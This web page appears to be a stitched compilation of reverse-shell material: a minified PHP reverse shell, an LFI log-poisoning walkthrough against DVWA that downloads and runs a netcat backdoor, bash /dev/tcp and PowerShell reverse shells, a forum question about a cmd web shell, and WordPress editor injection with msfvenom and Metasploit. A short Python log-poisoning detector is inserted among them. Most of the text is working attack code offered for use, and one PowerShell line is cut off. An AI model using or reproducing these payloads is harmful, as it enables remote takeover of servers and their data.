PHP Script for Reverse Shell

A PHP script that provides a reverse shell. After the user downloads it, the PHP file is extracted and a password-protected backdoor shell bound to 0.0.0.0 is created inside the extracted folder. The user needs to download only two files in order to get a reverse shell.

Want to do some good in the world with your PHP knowledge? This app will exploit a target server using a reverse shell and send back useful information such as open ports, OS version derived from banner, etc. This is an absolute gem which will get you up and running quickly.

PHP Reverse Shell File – Minified

(Untested as of now.) If you want to be sure, use the original at http://pentestmonkey.net/tools/web-shells/php-reverse-shell

<?php set_time_limit(0);$VERSION="1.0";$ip='127.0.0.1';$port=1337;$chunk_size=1400;$write_a=null;$error_a=null;$shell='uname -a; w; id; /bin/sh -i';$daemon=0;$debug=0;if(function_exists('pcntl_fork')){$pid=pcntl_fork();if($pid==-1){printit("ERROR: Can't fork");exit(1);}if($pid){exit(0);}if(posix_setsid()==-1){printit("Error: Can't setsid()");exit(1);}$daemon=1;}else {printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");}chdir("/");umask(0);$sock=fsockopen($ip,$port,$errno,$errstr,30);if(!$sock){printit("$errstr ($errno)");exit(1);}$descriptorspec=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));$process=proc_open($shell,$descriptorspec,$pipes);if(!is_resource($process)){printit("ERROR: Can't spawn shell");exit(1);}stream_set_blocking($pipes[0],0);stream_set_blocking($pipes[1],0);stream_set_blocking($pipes[2],0);stream_set_blocking($sock,0);printit("Successfully opened reverse shell to $ip:$port");while(1){if(feof($sock)){printit("ERROR: Shell connection terminated");break;}if(feof($pipes[1])){printit("ERROR: Shell process terminated");break;}$read_a=array($sock,$pipes[1],$pipes[2]);$num_changed_sockets=stream_select($read_a,$write_a,$error_a,null);if(in_array($sock,$read_a)){if($debug)printit("SOCK READ");$input=fread($sock,$chunk_size);if($debug)printit("SOCK: $input");fwrite($pipes[0],$input);}if(in_array($pipes[1],$read_a)){if($debug)printit("STDOUT READ");$input=fread($pipes[1],$chunk_size);if($debug)printit("STDOUT: $input");fwrite($sock,$input);}if(in_array($pipes[2],$read_a)){if($debug)printit("STDERR READ");$input=fread($pipes[2],$chunk_size);if($debug)printit("STDERR: $input");fwrite($sock,$input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);function printit($string){if(!$daemon){print"$string\n";}}?>



Let's say that your server has an LFI vulnerability, or that the attacker could upload an evil PHP script to your web server. In this case I will explore the first condition, LFI. Let's create a slightly more difficult scenario for the attacker and something more secure for the victim :)
The web server is a Windows 7 machine with XAMPP, but it has one small misconfiguration problem which can be disastrous for a web server. The admin forgot to disable the register_globals and allow_url settings in php.ini, which allows an attacker to include a local or remote file into running PHP code.

The attacker sends this code to the web server log file through Netcat.




On the victim's machine we can see how the previous request was saved in the log file.






Now the attacker visits the victim's vulnerable web page with his browser.








A Linux web server has these tools preinstalled: wget, nc, sbd, ncat. But what about Windows? I leave it as an exercise to you to research other ways of getting a reverse shell. The attacker wants to download netcat from his server and execute it. The following script downloads a file from the attacker's server:



http://localhost/dvwa/vulnerabilities/fi/?page=C:\xampp\apache\logs\access.log&cmd=echo+"<?php+$socket=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_connect($socket,'192.168.1.6',8888);socket_recv($socket,$buf,29184,MSG_WAITALL);$file=fopen('backdoor.exe','wb');fwrite($file,$buf);socket_close($socket);?>"+>+downloader.php



The attacker uses a netcat listener to serve his file, but first uses UPX to compress netcat.

nc -nlvp 8888 < nc.exe
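From the defender's side, the log-poisoning chain above leaves two traces in the Apache access log: a request carrying a raw PHP open tag (the poisoning step) and a later request whose file-inclusion parameter points at an absolute path or at the log itself. The following detector is an added example, not code from the original page; the log lines, regexes and function names are constructed here for illustration.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed sample Apache access.log lines (not taken from the page):
# line 1 is a normal request, line 2 writes a PHP tag into the log via the
# request line (log poisoning), line 3 includes that log through the LFI parameter.
SAMPLE_LOG = r'''
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /dvwa/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /<?php system($_GET['cmd']); ?> HTTP/1.1" 404 210 "-" "nc"
10.0.0.9 - - [01/Jan/2024:10:02:00 +0000] "GET /dvwa/vulnerabilities/fi/?page=C:\xampp\apache\logs\access.log&cmd=whoami HTTP/1.1" 200 980 "-" "Mozilla/5.0"
'''.strip().splitlines()

# Combined log format: ip ident user [time] "METHOD target proto" status size "referer" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" \d+ \S+ "[^"]*" "(?P<ua>[^"]*)"')
PHP_TAG = re.compile(r'<\?(php|=)', re.IGNORECASE)
# Inclusion values that point outside the web root: traversal, a Windows drive
# path, sensitive Unix directories, or the web server's own log files.
LFI_VALUE = re.compile(r'(\.\./|\.\.\\|^[a-zA-Z]:\\|^/(etc|var|proc)/|access\.log|error\.log)', re.IGNORECASE)

def analyse_line(line):
    """Return a list of finding labels for one access.log line (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ['unparsed']
    findings = []
    # A raw PHP tag anywhere in the logged request only matters because the log
    # will later be included and executed; Apache stores the request verbatim.
    if PHP_TAG.search(line):
        findings.append('log-poisoning')
    params = parse_qs(urlparse(unquote(m.group('target'))).query)
    for key, values in params.items():
        if any(LFI_VALUE.search(v) for v in values):
            findings.append(f'lfi:{key}')
    if 'cmd' in params:
        findings.append('cmd-parameter')
    return findings

def scan(lines):
    """Group findings by source IP, dropping lines with nothing suspicious."""
    report = {}
    for line in lines:
        findings = analyse_line(line)
        if findings:
            report.setdefault(line.split(' ', 1)[0], []).extend(findings)
    return report

if __name__ == '__main__':
    for ip, findings in scan(SAMPLE_LOG).items():
        print(ip, findings)
```

A single IP producing both a `log-poisoning` and an `lfi:` finding within minutes is the pattern to alert on; either alone is worth a look but is far noisier.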


PHP Reverse Shell (Exec in the background)
Ever found a one-shot PHP command injection vulnerability? The shell will open and then immediately die. You can run it in the background with this handy function 🙂

In longhand, it looks like this:

function execInBackground($cmd) {
    if (substr(php_uname(), 0, 7) == "Windows") {
        pclose(popen("start /B " . $cmd, "r"));
    } else {
        exec($cmd . " > /dev/null &");
    }
}
execInBackground("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP_HERE/YOUR_PORT_HERE 0>&1'");
However, I've done you the courtesy of shortening this into the one-liner below. This will run a command in the background on Windows or Linux (although of course remember that you need to change the payload if you're executing on Windows!).

function execInBackground($cmd) { if (substr(php_uname(), 0, 7) == "Windows"){ pclose(popen("start /B ". $cmd, "r"));  } else { exec($cmd . " > /dev/null &"); } } execInBackground("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.221/8081 0>&1'");





Powershell Reverse Shell (Inside Powershell.exe)
$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Clo





Reverse Shell



After the successful download it is time for the attacker to execute his backdoor and get a remote shell. He sets up a new listener on port 7777.



Attacker's Box -> nc -nlvp 7777



http://localhost/dvwa/vulnerabilities/fi/?page=C:\xampp\apache\logs\access.log&cmd=cmd+/c+backdoor.exe+192.168.1.X+7777+-e+cmd.exe



Powershell Reverse Shell (within cmd)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"








Reverse shell PHP with GET parameters
tillman.oliver
saved 3 months ago
I'm using a simple reverse shell php script:

$res = shell_exec($_GET['cmd']);
var_dump($res);
However, commands using spaces do not work:

shell.php?cmd="ls" works
shell.php?cmd="ls -lh" not working
shell.php?cmd="ls%20-lh" not working
I checked the error.log from my httpd server and the error shown is quite awkward:

sh: ls -lh: command not found
I guess it might be due to the encoding of the string received by $_GET but I have no idea how to fix the problem.

shell.php?cmd=ls -lh 



Reverse shell WordPress & Metasploit
Having an active session in WordPress to the admin page, we can edit the page source and inject code that can do literally anything when the page is executed.

Appearance -> Editor
Choose "index.php"


To test, we can inject simple PHP code into the index.php script. The page should show the text and, optionally, the output of a bash command passed through the 'cmd' variable.

<?php echo "Vry4n" ?>
<?php echo shell_exec($_GET['cmd']); ?>


Capturing the traffic with Burp Suite, we will analyze the server responses.

In the first picture we just see the string 'Vry4n' in the source code.


The second time we visit the page with the cmd parameter set (http://192.168.0.17/0/index.php?cmd=id).


Knowing that we can print to the screen and execute commands, we can proceed with the reverse connection.

Reverse Shell
From the attacking machine, we generate a payload using msfvenom. This will be in PHP, as the site already has many PHP scripts.

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.13 LPORT=443 -f raw


Copy this code into the editor in WordPress.



Start a listener in Metasploit:

sudo msfdb init
sudo msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.0.13
set LPORT 443
exploit


Now execute the script by visiting /index.php in the browser:

http://192.168.0.17/0/index.php
The connection should now show up in the Metasploit listener.



WordPress Plugin editor
Having access to the CMS admin console, you could modify a plugin's code and inject whatever you want.

Go to Plugins -> Editor



Locate the script you want to modify and add the code. I'd use Akismet; plugins are usually stored at /wp-content/plugins

<?php echo "Vry4n" ?>
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.13/443 0>&1'"); ?>



Conclusion

A PHP shell is lightweight and faster than netcat for a reverse shell.
